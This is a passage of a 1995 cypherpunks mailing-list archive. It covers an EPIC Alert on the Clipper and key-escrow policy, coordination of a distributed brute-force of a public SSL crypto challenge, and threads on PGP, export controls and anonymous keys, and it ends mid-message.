We really need mailers with auto-cryptography!  (as easy as in Lotus Notes)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDjcS1QXJENzYr45AQEgAwP/RWusaK/C4bcFVaSGRa6WXrrfJMAeeVXL
s5E221rx3POtKr6Nq+TZnlFs5uaian8u1XvCCApYEIPdYAcWIUtJJAp5soLhOyi7
ceF8slVJisYyexj1Zo5qHoOV+ajg/YZeRxL72ofQXF4gdsSbGUp4B6nE/ncRp2S+
nnKZyutOo4A=
=b09P
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert Zach" <ZACH@sesd.ilex.com>
Date: Mon, 21 Aug 95 13:24:34 PDT
To: cypherpunks@toad.com
Subject: Makes the News! (Was Re: SSL Broken)
Message-ID: <A231DA12C7@sesd.ilex.com>
MIME-Version: 1.0
Content-Type: text/plain


The first trade mag article I have seen on the Subject has been 
delivered to my doorstep!!

Check out COMMUNICATIONS WEEK August 21
PAGE 1

FYI
-Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 21 Aug 95 13:19:13 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: NSA into antigravity?
In-Reply-To: <199508190533.WAA14801@netcom16.netcom.com>
Message-ID: <Pine.SUN.3.91.950821161632.18939A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 18 Aug 1995, Vladimir Z. Nuri wrote:

> >On July 19, Gerald Ollman and Robert Wayne, two researchers from the
> >University of Maryland geophysics department were detained in Fort Meade,

Neither Ollman nor Wayne have umail accounts (which every faculty member 
gets), so I think it is very possible that these people do not exist.

-Thomas Edwards





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Mon, 21 Aug 95 13:49:40 PDT
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: EPIC Alert 2.09
Message-ID: <n1403098783.52049@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


     =============================================================
      
        @@@@  @@@@  @@@  @@@@      @    @     @@@@  @@@@  @@@@@
        @     @  @   @   @        @ @   @     @     @  @    @
        @@@@  @@@    @   @       @@@@@  @     @@@   @@@     @
        @     @      @   @       @   @  @     @     @  @    @
        @@@@  @     @@@  @@@@    @   @  @@@@  @@@@  @   @   @

     =============================================================
     Volume 2.09                                   August 21, 1995
     -------------------------------------------------------------

                         Published by the
           Electronic Privacy Information Center (EPIC)
                          Washington, DC
                          info@epic.org
                       http://www.epic.org

                    *Special Edition: Crypto*

=======================================================================
Table of Contents 
=======================================================================
  
 [1] "New" Crypto Policy Announced: Clipper II?
 [2] NIST Announcement on Key-Escrow Workshops
 [3] Documents: FBI & NSA Want to Ban Non-Escrowed Encryption
 [4] EPIC Crypto Web Pages Online	
 [5] Upcoming Conferences and Events

=======================================================================
[1] "New" Crypto Policy Announced: Clipper II?
=======================================================================

The Clinton Administration ended a year of silence on August 17 when
it issued a long-awaited statement on the Clipper Chip and key-escrow
encryption.  Unfortunately, the "new" policy is merely a re-working of
the old one -- the Administration remains committed to key-escrow
techniques that ensure government agents access to encrypted
communications.  The only changes are a willingness to consider the
export of 64-bit encryption (if "properly escrowed"), the possibility
of private sector escrow agents to serve as key-holders, and
consideration of software implementations of key-escrow technologies.

As EPIC Advisory Board member Whit Diffie observed in an op-ed piece
in the New York Times, the new approach won't work.  "While other
nations may share our interest in reading encrypted messages for law
enforcement purposes, they are unlikely to embrace a system that
leaves them vulnerable to U.S. spying.  They will reject any system
that gives decoding ability to agents in the United States."  Diffie
further notes that "64-bit keys are not expected to be adequate."

In a statement re-printed below, the National Institute of Standards
and Technology (NIST) announced two public workshops "to discuss key
escrow issues."  More information concerning these meetings can be
obtained from Arlene Carlton at NIST, (301) 975-3240, fax: (301)
948-1784, e-mail: carlton@micf.nist.gov.

=======================================================================
[2] NIST Announcement on Key-Escrow Workshops
=======================================================================

EMBARGOED FOR RELEASE:                  NIST 95-24
3 p.m. EDT, Thursday, Aug. 17, 1995

Contact:  Anne Enright Shepherd         COMMERCE'S NIST ANNOUNCES
          (301) 975-4858                PROCESS FOR DIALOGUE ON
                                        KEY ESCROW ISSUES

     Furthering the Administration's commitment to defining a
workable key escrow encryption strategy that would satisfy
government and be acceptable to business and private users of
cryptography, the Commerce Department's National Institute of
Standards and Technology announced today renewed dialogue on key
escrow issues.

     A Sept. 6-7 workshop will convene industry and government
officials to discuss key escrow issues, including proposed
liberalization of export control procedures for key escrow
software products with key lengths up to 64 bits, which would
benefit software manufacturers interested in building secure
encryption products that can be used both domestically and
abroad.

     Key escrow encryption is part of the Administration's
initiative to promote the use of strong techniques to protect the
privacy of data and voice transmissions by companies, government
agencies and others without compromising the government's ability
to carry out lawful wiretaps.

     In a July 1994 letter to former Rep. Maria Cantwell, Vice
President Gore said that the government would work on developing
exportable key escrow encryption systems that would allow escrow
agents outside the government, not rely on classified algorithms,
be implementable in hardware or software, and meet the needs of
industry as well as law enforcement and national security.  Since
that time, discussions with industry have provided valuable
guidance to the Administration in the development of this policy.
For example, many companies are interested in using a corporate
key escrow system to ensure reliable back-up access to encrypted
information, and the renewed commitment should foster the
development of such services.

     Consideration of additional implementations of key escrow
comes in response to concerns expressed by software industry
representatives that the Administration's key escrow policies did
not provide for a software implementation of key escrow and in
light of the needs of federal agencies for commercial encryption
products in hardware and software to protect unclassified
information on computer and data networks.

     Officials also announced a second workshop at which industry
is invited to help develop additional Federal Information
Processing Standards for key escrow encryption, specifically to
include software implementations.  This standards activity would
provide federal government agencies with wider choices among
approved key escrow encryption products using either hardware or
software.  Federal Information Processing Standards provide
guidance to agencies of the federal government in their
procurement and use of computer systems and equipment.

     Industry representatives and others interested in joining
this standards-development effort are invited to a key escrow
standards exploratory workshop on Sept. 15 in Gaithersburg, Md.
This workshop is an outgrowth of last year's meetings in which
government and industry officials discussed possible technical
approaches to software key escrow encryption.

     The Escrowed Encryption Standard, a Federal Information
Processing Standard for use by federal agencies and available for
use by others, specifies use of a Key Escrow chip (once referred
to as "Clipper chip") to provide strong encryption protection for
sensitive but unclassified voice, fax and modem communications
over telephone lines.  Currently, this hardware-based standard is
the only FIPS-approved key escrow technique.  NIST officials
anticipate proposing a revision to the Escrowed Encryption
Standard to allow it to cover electronic data transmitted over
computer networks.  Under this revised federal standard, the
Capstone chip and other hardware-based key escrow techniques
developed for use in protecting such electronic data also will be
approved for use by federal agencies.

     As a non-regulatory agency of the Commerce Department's
Technology Administration, NIST promotes U.S. economic growth by
working with industry to develop and apply technology,
measurements and standards.

=======================================================================
[3] Documents: FBI & NSA Want to Ban Non-Escrowed Encryption
=======================================================================

On a related note ...

Declassified government documents recently obtained by EPIC show 
that key federal agencies concluded more than two years ago that the 
"Clipper Chip" key-escrow initiative will only succeed if alternative 
security techniques are outlawed.  The information is contained in 
several hundred pages of material concerning Clipper and cryptography 
EPIC obtained from the FBI under the Freedom of Information Act.  

The conclusions contained in the documents appear to conflict 
with frequent Administration claims that use of key-escrow technology 
will remain "voluntary."  Critics of the government's initiative, 
including EPIC, have long maintained that government-sanctioned key-
escrow encryption techniques would only serve their stated purpose if 
made mandatory.  According to the FBI documents, that view is shared by 
the Bureau, the National Security Agency (NSA) and the Department of 
Justice (DOJ).

In a "briefing document" titled "Encryption: The Threat, 
Applications and Potential Solutions," and sent to the National 
Security Council in February 1993, the FBI, NSA and DOJ concluded that:

   Technical solutions, such as they are, will only work if 
   they are incorporated into *all* encryption products.  To 
   ensure that this occurs, legislation mandating the use of   
   Government-approved encryption products or adherence to 
   Government encryption criteria is required.

Likewise, an undated FBI report titled "Impact of Emerging 
Telecommunications Technologies on Law Enforcement" observes that 
"[a]lthough the export of encryption products by the United States is 
controlled, domestic use is not regulated."  The report concludes that 
"a national policy embodied in legislation is needed."  Such a policy, 
according to the FBI, must ensure "real-time decryption by law 
enforcement" and "prohibit[] cryptography that cannot meet the 
Government standard."

The FBI conclusions stand in stark contrast to public assurances 
that the government does not intend to prohibit the use of non-
escrowed encryption.  Testifying before a Senate Judiciary 
Subcommittee on May 3, 1994, Assistant Attorney General Jo Ann 
Harris asserted that:

   As the Administration has made clear on a number of occasions,
   the key-escrow encryption initiative is a voluntary one; we 
   have absolutely no intention of mandating private use of a 
   particular kind of cryptography, nor of criminalizing the 
   private use of certain kinds of cryptography.

The newly-disclosed information suggests that the architects of 
the key-escrow program -- NSA and the FBI -- have always recognized 
that key-escrow must eventually be mandated.  Coming to light on the 
eve of the announcement of a "new" Administration policy, the FBI 
documents raise significant questions as to the government's long-term 
strategy on the cryptography issue. 

Scanned images of several key documents are available via the 
World Wide Web at http://www.epic.org/crypto/ban/fbi_dox/

=======================================================================
[4] EPIC Crypto Policy Web Pages Online	
=======================================================================

EPIC is now making available an extensive series of pages on
cryptography policy.  Each page highlights an area of controversy and
provides links to key documents.  Materials include formerly secret
government documents obtained under FOIA by EPIC and CPSR, reports
from the Office of Technology Assessment, the General Accounting
Office and others on cryptography. Topics include:

	o Efforts to ban cryptography
	o The Clipper Chip
	o The Digital Signature Standard
	o The Computer Security Act of 1987

The pages are available at http://www.epic.org/crypto/   More pages 
will become available soon.

=======================================================================
[5] Upcoming Privacy Related Conferences and Events
=======================================================================

Advanced Surveillance Technologies. Sept. 4, 1995. Copenhagen,
Denmark. Sponsored by Privacy International and EPIC. Contact
pi@privacy.org. http://www.privacy.org/pi/conference/

17th International Conference of Data Protection and Privacy
Commissioners. Copenhagen, Denmark. September 6-8, 1995. Sponsored by
the Danish Data Protection Agency. Contact Henrik Waaben, +45 33 14 38
44 (tel), +45 33 13 38 43 (fax).

InfoWarCon '95. September 7-8, 1995. Arlington, VA. Sponsored by NCSA
and OSS. Email: 74777.3033@compuserve.com.

Business and Legal Aspects of Internet and Online Services. Sept. 
14-15. New York City. Sponsored by National Law Journal and New York 
Law Journal. Contact: (800)888-8300, ext. 6111, or (212)545-6111.

The Good, the Bad, and the Internet: A Conference on Critical Issues
in Information Technology. October 7-8. Chicago, Ill. Sponsored by
CPSR. Contact cpsr@cpsr.org or
http://www.cs.uchicago.edu/discussions/cpsr/annual

18th National Information Systems Security Conference. Oct. 10-13. 
Baltimore, MD. Sponsored by NSA and NIST. Contact: 301-975-3883.

Managing the Privacy Revolution. Oct. 31 - Nov. 1, 1995. Washington,
DC. Sponsored by Privacy & American Business. Speakers include Mike
Nelson (White House), C.B. Rogers (Equifax) and Marc Rotenberg (EPIC).
Contact Alan Westin 201/996-1154.

22nd Annual Computer Security Conference and Exhibition. Nov. 6-8, 
Washington, DC. Sponsored by the Computer Security Institute. 
Contact: 415-905-2626.

Global Security and Global Competitiveness: Open Source Solutions.
Nov. 7-9. Washington, D.C. Sponsored by OSS. Contact: Robert Steele
oss@oss.net.

11th Annual Computer Security Applications Conference: Technical
papers, panels, vendor presentations, and tutorials that address the
application of computer security and safety technologies in the civil,
defense, and commercial environments. Dec. 11-15, 1995, New Orleans,
Louisiana. Contact Vince Reed at (205)890-3323 or vreed@mitre.org.

Computers Freedom and Privacy '96. March 27-30. Cambridge, Mass.
Sponsored by MIT, ACM and WWW Consortium. Contact cfp96@mit.edu or
http://www-swiss.ai.mit.edu/~switz/cfp96

Australasian Conference on Information Security and Privacy June
24-26, 1996. New South Wales, Australia. Sponsored by Australasian
Society for Electronic Security and University of Wollongong. Contact:
Jennifer Seberry (jennie@cs.uow.edu.au).

             (Send calendar submissions to Alert@epic.org)

=======================================================================

The EPIC Alert is a free biweekly publication of the Electronic
Privacy Information Center.  To subscribe, send the message:

    SUBSCRIBE CPSR-ANNOUNCE Firstname Lastname

to listserv@cpsr.org.  You may also receive the Alert by reading the
USENET newsgroup comp.org.cpsr.announce.

Back issues are available via http://www.epic.org/alert/ or
FTP/WAIS/Gopher/HTTP from cpsr.org /cpsr/alert/ and on Compuserve (Go
NCSA), Library 2 (EPIC/Ethics).


=======================================================================

The Electronic Privacy Information Center is a public interest
research center in Washington, DC.  It was established in 1994 to
focus public attention on emerging privacy issues relating to the
National Information Infrastructure, such as the Clipper Chip, the
Digital Telephony proposal, medical record privacy, and the sale of
consumer data.  EPIC is sponsored by the Fund for Constitutional
Government and Computer Professionals for Social Responsibility. EPIC
publishes the EPIC Alert and EPIC Reports, pursues Freedom of
Information Act litigation, and conducts policy research on emerging
privacy issues. For more information, email info@epic.org, WWW at
HTTP://www.epic.org or write EPIC, 666 Pennsylvania Ave., SE, Suite 
301, Washington, DC 20003. (202) 544-9240 (tel), (202) 547-5482 (fax).

The Fund for Constitutional Government is a non-profit organization
established in 1974 to protect civil liberties and constitutional
rights.  Computer Professionals for Social Responsibility is a
national membership organization of people concerned about the impact
of technology on society.  For information contact: cpsr-info@cpsr.org

If you'd like to support the work of the Electronic Privacy
Information Center, contributions are welcome and fully
tax-deductible.  Checks should be made out to "The Fund for
Constitutional Government" and sent to EPIC, 666 Pennsylvania Ave.,
SE, Suite 301, Washington DC 20003.

Your contributions will help support Freedom of Information Act
litigation, strong and effective advocacy for the right of privacy and
efforts to oppose government regulation of encryption and funding of
the National Wiretap Plan.

Thank you for your support.

------------------------ END EPIC Alert 2.09 ------------------------




_________________________________________________________________________
Subject: EPIC Alert 2.09
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas M. Swiss" <tms@TIS.COM>
Date: Mon, 21 Aug 95 13:54:48 PDT
To: cypherpunks@toad.com
Subject: interesting quote, Baltimore Sun 8/21
Message-ID: <199508212050.QAA05657@ziggy.tis.com>
MIME-Version: 1.0
Content-Type: text/plain



     Page 7A of today's _Baltimore Sun_ features an op-ed piece by Carl
R. Eisendrath, "a former U.S. foreign-service officer", entitled "Bringing
Light to Covert Operations", which cites an interesting quotation:

     "In the period between the two world wars, Secretary of War Henry
      Stimson closed the cryptography section of the State Department
      because, as he reputedly said, "Gentlemen don't read each other's
      mail."

-Tom Swiss / tms@tis.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Mon, 21 Aug 95 08:12:39 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <9508211509.AA04027@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> The car system used here in the U.S. is called "Lo-Jack," as in the
> opposite of "hijack." I don't see how putting the transponders in ignition
> keys would do much to stop theft, but maybe I'm unaware of European
> developments. (There are keys with chips in them, acting as electronic
> keys, or to make the keys harder to duplicate, but not to track the cars.)

The computer which controls the engine checks whether there is a transponder
in the ignition key. The key sends a 32 bit ID number. If this number was
registered in the computer, the engine works, otherwise not. You can't start
the engine just by shortcutting some wires.



> >Perhaps a drug dealer may be more usefull if he moves free and
> >has a transponder inside which he doesn't know about, that having
> >him in jail.

[ This should have been "than having him...". I was very tired yesterday
 evening. It's embarrassing to see how many typos I made :-( ]


> Implausible. The theft detectors are not picking up specific transponders,
> just the "on" or "off" state of the things attached to clothing, books,
> CDs, etc. (I say "things" because some of them are strips inserted in
> books, some are tag-like things clamped to clothing, etc.)

No, the theft detectors don't. But they are big and unsuspicious enough to
hide specific detectors for big brothers...



> Again, the infrastructure is lacking. The simple detectors in stores would
> have to be upgraded to track more sophisticated transponders. The stores
> would have to cooperate, etc. Implausible.

Why implausible? Stores cooperate. I know about a big department store in 
Germany (but I don't tell you which one) which has a large secret military
hospital and a medical stock below its basement. None of the employees
knows about it. If they cooperate in having a complete hospital inside, why
shouldn't they cooperate in having some antennas and some wires?

Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 21 Aug 95 09:30:47 PDT
To: cypherpunks@toad.com
Subject: NEXT CHALLENGE: plan of action?
Message-ID: <25403.9508211621@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



[First please moderate my previous couple of postings with the
knowledge that they may (if they even got out) have been hanging in
suspended animation for ~40 hours due to stuffed mail server, and some
things have changed since then.]

I've been out of things for a couple of days due to aforementioned
dead mailer.  All's well now (well it's croaking along passably
anyway).

Just posted a config file for Hal's 2nd challenge, which Alex Tang
<altitude@cic.net> has kindly checked.

I read on Saturday Ian Goldberg's post about starting out on the
challenge using Damien's code.

It doesn't matter a great deal which code is used as such, but the
main thing is to ensure that this is a coordinated effort.  The aim of
the challenge (which I requested and Hal kindly provided just before
popping off for a week or so's holiday) was to see how fast a SSL
challenge could be broken.  Not how *soon*, note the distinction.

That means that if for instance we count the time that Ian has been
clocking up since Saturday, the real time will be slowed by approx 2
days.  We really need to do this with a starting-line like affair, so
that someone is running a server, and everyone gets the code compiled
etc, and then the server starts offering the challenge and all the
clients fire off.

That way we have a less straggly start up which makes for better
bruteing figures.

Agreed so far?


If so here's my ideas...


Use Andrew Roos client & Piete's socket server / WWW client for the
reason that this combination has been designed to operate both an
automated sockets master / slave system and offer manual key
allocation over WWW for those without direct connectivity, or behind
firewalls.

All of the software for this system is indexed from the URL:

	http://www.brute.cl.cam.ac.uk/brute/
or	ftp://ftp.brute.cl.cam.ac.uk/pub/brute/

The socket server running SKSP protocol (more on the protocol later)
is at this address:

	sksp.brute.cl.cam.ac.uk 19957

(ie port no 19957)


The clients are setup to use this address by default in any case.  The
WWW based key doler is indexed from the WWW page above:

	http://www.brute.cl.cam.ac.uk/brute/

and this (transparently) interacts with the socket server also, so WWW
users can via a WWW forms interface take out keyspace to sweep, and
return the keyspace after sweeping.


The SKSP (Simple Key Searching Protocol) is described in an RFC like
document available here:

	http://www.brute.cl.cam.ac.uk/ftp/pub/brute/protocol.txt

for anyone wishing to write clients for other platforms, or with more
advanced features, or for those simply wishing to know what language
the client is talking.


Where to find things...

The brutessl software, the unix socket client, and the Windows NT
client are on:

	http://www.brute.cl.cam.ac.uk/brute/

Also I have put an untarred version of the brutessl code here:

	http://dcs.ex.ac.uk/~aba/brutessl/

(individual files untarred).

If and when people compile binaries for architectures which don't
typically come with compilers by default - such as DOS, OS/2, Macs,
I'll put any binaries sent to me in this directory, and / or send to
Piete for a pointer to this repository, or copying to brute.cl.


UNIX client.

How to use the unix client...  download brclient from the www page:

	http://www.brute.cl.cam.ac.uk/brute/

it is a perl program so you may have to edit the path to perl (the 1st
line of the program should be #!/full/path/to/perl/binary), and you
will have to mark it as executable.

You will also need a shell script called brloop which uses brclient.
It is on Piete's "sources" page, this page is indexed from the main
brute page above, here it is explicitly.

	http://www.brute.cl.cam.ac.uk/ftp/pub/brute/README.html

So get brloop.

Get and compile the brutessl.tar.gz file.

Run brloop.

The brclient perl socket client talks to a machine with a DNS:

	sksp.brute.cl.cam.ac.uk on port number 19957

At the moment the server is running and will ask your client to sleep,
as the challenge has not been started yet.  When Piete starts it up,
your client will periodically ask for work, before the start time
(Tue 12:00 GMT, or later time if this time is changed) your client
will just be told to sleep for a while, when it wakes up it will ask
for work again.  In this way the client can be left ticking over, when
work does arrive it will notice, as it will actually receive some work
when it makes the request, and start doing it, and reporting back when
it finishes each chunk.

There is a windows NT socket client written by Andrew Brown, pointers
to that also.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Mon, 21 Aug 95 14:26:21 PDT
To: ethridge@Onramp.NET (Allen B. Ethridge)
Subject: Re: Newton 2
In-Reply-To: <v02130500ac5e436d94d4@[199.1.11.207]>
Message-ID: <199508212124.RAA28766@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> I've heard a few times that not having a C compiler prevents the
> implementation of PGP.  Why?  Do the RSA people refuse to license a
> non-C implementation.  If so, can they still enforce their patent
> against someone who implemented it on a platform that didn't have a C
> compiler?

The problem is that PGP needs to be compiled from its C sources into a
binary.  The problem is not RSA not licensing; the problem is that PGP
(and all the support routines, including RSA) is implemented in C.
Therefore, if you do not have a C compiler, you cannot turn the
sources into a binary.

If you don't have a C compiler, you could re-implement PGP, but it
would be a lot of work, and you would still have the RSA patent
issues.  Also, it is against the RSAREF license to convert RSAREF into
another language, so you can't take that route, either.

The easiest way to port PGP to a new platform is to get a C compiler
for that platform.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 21 Aug 95 14:41:46 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Third World Man
In-Reply-To: <ac5d49b804021004ff37@[205.199.118.202]>
Message-ID: <199508212141.RAA03543@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Strong cryptography is needed for a secure information
infrastructure.  If American companies aren't allowed to build secure
infrastructure, then parts of the infrastructure will move overseas, as
insurance, liability, and deployment costs rise for a badly secured
network.

	This issue will not cause the USA to become a third world
nation, but it will contribute to large institutions moving their data
processing out.  Tim, you've talked a lot about how companies will
move data centers out of the US to avoid 'expensive' laws; do you see
the ITARs as being in a different category, than say, the laws on
reporting a bankruptcy?

Adam

Tim May wrote:

| At 9:19 PM 8/20/95, Adam Shostack wrote:
| >        No.  Banning strong crypto will not help; those darn furriners
| >are using it anyway.  What it will mean is that the Information
| >Infrastructure of the future will bypass the United States, as without
| >strong cryptography, it is impossible to build a secure architecture.
| >
| >        Should the United States wish to relegate itself to the status
| >of a third world nation because of terrorists, drug dealers, child
| >pornographers and money launderers, that is indeed unfortunate.
| 
| The U.S. is not likely to find itself relegated to third world status over
| this issue. Rhetorically, I wish it were so, but it just ain't. This
| issue--like the McCarthy hearings in the 1950s, the race issue in the '60s,
| the Vietnam war in the '60s and '70s, to name a few cases, _sounds_ really
| serious. And it is, as those cases were, but predicting the imminent
| collapse of American civilization is usually a lose.
| 
| There is no way the technological and manufacturing prowess of leading
| American companies will be substantially crippled.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 21 Aug 95 18:14:42 PDT
To: cypherpunks@toad.com
Subject: Re: Third World Man
Message-ID: <ac5e7d620c0210040220@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:41 PM 8/21/95, Adam Shostack wrote:
>        Strong cryptography is needed for a secure information
>infrastructure.  If American companies aren't allowed to build secure
>infrastructure, then parts of the infrastructure will move overseas, as
>insurance, liability, and deployment costs rise for a badly secured
>network.
>
>        This issue will not cause the USA to become a third world
>nation, but it will contribute to large institutions moving their data
>processing out.  Tim, you've talked a lot about how companies will
>move data centers out of the US to avoid 'expensive' laws; do you see
>the ITARs as being in a different category, than say, the laws on
>reporting a bankruptcy?

Sure, they will move some parts of their operations to other jurisdictions.
They already are, for various reasons. Most large U.S. companies are of
course "multinationals."

I didn't cite examples, and won't now. (But you can imagine a few of the
many successful U.S. companies: Sun, Intel, Microsoft, SGI, Qualcomm,
Altera, Merck, and on and on.)

I am not saying that things are as they should be. And I am not a U.S.
chauvinist. I really don't care which countries do well, so long as my
investments continue to do well.

My point was that hyperbole about the U.S. being on the verge of becoming a
Third World nation is wrong. As Sternlight might put it, "arrant nonsense."

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 21 Aug 95 18:19:04 PDT
To: cypherpunks@toad.com
Subject: Quantum Computers for the 12th Time
Message-ID: <ac5e7f1f0d0210046adb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:00 PM 8/21/95, J. Kent Hastings wrote:

>Doesn't quantum coherence require molecular precision if it
>is to work on 1024 bit PGP keys? If it works, such keys can
>be instantly factorized. It would be nice to follow that progress.
>
>If human engineered molecular nano works, we'll have much
>more than PGP to worry about. Copies of copies of
>replicating disassemblers could rip the Earth apart in three
>days, assuming doubling every 20 minutes like bacteria,
>but not limited to proteins.
>
>That would have a big impact on digital cash networks!

I urge all those interested in quantum computers to consult the CP
archives. Also, my FAQ has a couple of pages on it. Grep for the main
topic, or for Shor.

This comes up every 3-4 months and produces the same speculations.

I think nanotech and quantum computers have even less to do with real
concerns than Waco and Foster do.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Mon, 21 Aug 95 18:40:36 PDT
To: Carl Ellison <cme@tis.com>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <9508211920.AA27347@tis.com>
Message-ID: <199508220140.TAA12229@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> >Thanks again, and I hope you go ahead and start PGP-clearsigning your posts
> 
> Yes, I've been remiss.  It's an old belief -- that signing is expensive.
> Now that I'm using emacs extensions and RMAIL, it's really easy -- but I
> still follow the old habit.
> 
> We really need mailers with auto-cryptography!  (as easy as in Lotus Notes)


I have a pretty easy-to-use set-up...


Not to seem picky or anything, but now that I have a clearsigned message
from you, I need your public key in order to verify it.   :-)


Regards,

Bryce

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Mon, 21 Aug 95 18:47:07 PDT
To: wilcoxb@cs.colorado.edu
Subject: No Subject
Message-ID: <199508220146.TAA12445@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Here is an article that I just posted to alt.security.pgp and sci.crypt.
Having had a couple of hours to calm down, it seems a little frenetic, but
there is enough truth in it that I will now repost it to cypherpunks.

Context:  Someone was asking how he could go about verifying the identity of
an anonymous interlocutor, so that he could sign his public key.



- -----BEGIN PGP SIGNED MESSAGE-----

Look, I don't have a lot of time here, but I need to say that this whole
"certifying anonymous keys" idea is misled.  The fact is, *I* *don't* *care*
what your True Name is.


I can only think of two reasons why you would need a person's True Name,
and I doubt that anybody here can apply either of these reasons to anyone 
else here.


Reason Number Uno, why you might want a person's True Name:

Because you want to physically hurt them, or effectively threaten to hurt
them.  (Or send someone else to do it, like a hit man, policeman, etc.)


Reason Number Dos, why you might want a person's True Name:

Because you want to have sex with them.  (Or as above, if you prefer to do it
through proxies...)



Okay now does anyone want to do any of the above two things to me?  If not
then *don't* *worry* about whether my public key is signed by anyone or not.
It makes zero difference to you until such a time as one of the above
motivations acquires.



Zimmermann et al. were/are naive to emphasize the Web of Trust as a means of
introducing strangers.  With very few exceptions, strangers don't *need*
to verify each other's physical identities!  This fact is central to some of
the more interesting social evolutions that information technology promises
to cause.  In retrospect, the emphasis in "pgpdoc1.txt" on verifying True
Names via mutually trusted introducers will seem quaint.



Bryce
Announcement: I have had technical difficulties.  If you sent me e-mail
between Aug 5 and Aug 20 and didn't receive a response, please re-send.
signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Mon, 21 Aug 95 17:18:13 PDT
To: cypherpunks@toad.com
Subject: Why 64 bit keys?
Message-ID: <01HUCIWH37YW8ZEX8O@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Sat, 19 Aug 1995 15:13:35 -0400
>From: shamrock@netcom.com (Lucky Green)
>Subject: Re: 64 bit keys breakable by the NSA or just some random key length?

>I think the obvious conclusion would be because 64bits is crackable
>if need be and if you have the resources the government has. Not for
>routine monitoring of undesirables, but for those special cases
>where they don't want to expose their activities by requesting a
>warrant.

I think it's much more important to the powers that be (and that
eavesdrop) that a key of up to 64 bits includes DES, which means
that lots of system designers will use DES instead of (say) 3DES,
IDEA, or Blowfish.  It's virtually certain that NSA and others have
built keysearch machines for DES.  This gives NSA, et al., a way
